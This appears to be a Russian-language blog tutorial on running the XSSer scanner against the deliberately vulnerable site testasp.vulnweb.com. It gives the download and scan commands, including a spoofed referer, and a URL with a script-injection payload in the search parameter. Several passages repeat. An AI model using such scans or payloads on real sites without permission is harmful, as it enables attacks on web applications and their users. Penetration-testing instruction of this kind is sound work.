официальный сайт ! список команд
XSSer является открытым исходным кодом, тестирования на проникновение инструмент, который автоматизирует процесс обнаружения и использования XSS-инъекций с различными приложениями. мы будем тестировать этот инструмент на http://testasp.vulnweb.com/ уязвимого сайта.
скачать XSSer
выполняем все команды в терминале одна за одной
1 root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
2 root@punter:/pentest/web# cd xsser
3 root@punter:/pentest/web/xsser# python XSSer.py -u “http://testasp.vulnweb.com” -g “Search.asp? 4.tfSearch=” –proxy “http://127.0.0.1:8118″ –referer “666.666.666.666″ –user-agent “correct audit” –Fuzz -s
смотрим на результат
XSSer является открытым исходным кодом, тестирования на проникновение инструмент, который автоматизирует процесс обнаружения и использования XSS-инъекций с различными приложениями. мы будем тестировать этот инструмент на http://testasp.vulnweb.com/ уязвимого сайта.
скачать XSSer
выполняем все команды в терминале одна за одной
1 root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
2 root@punter:/pentest/web# cd xsser
3 root@punter:/pentest/web/xsser# python XSSer.py -u “http://testasp.vulnweb.com” -g “Search.asp? 4.tfSearch=” –proxy “http://127.0.0.1:8118″ –referer “666.666.666.666″ –user-agent “correct audit” –Fuzz -s
смотрим на результат
не важен скрин ! главное последнее
не важен скрин ! главное последнее
выше результаты, отмечены синим URL мы будем тестировать результаты вручную, чтобы подтвердить XSS уязвимость Пререход в браузер
вызов текст может быть любым http://testasp.vulnweb.com/Search.asp?tfSearch=<script>alert("http://lord-blogggger.blogspot.com")</script>
скопировали любой синий адрес и вставили в браузер !
скопировали любой синий адрес и вставили в браузер !
собственно все мы нашли уязвимость которую можно использовать но как использовать это другая тема
полный обзор по xss
полный обзор по xss
Во, спасибо)
ОтветитьУдалить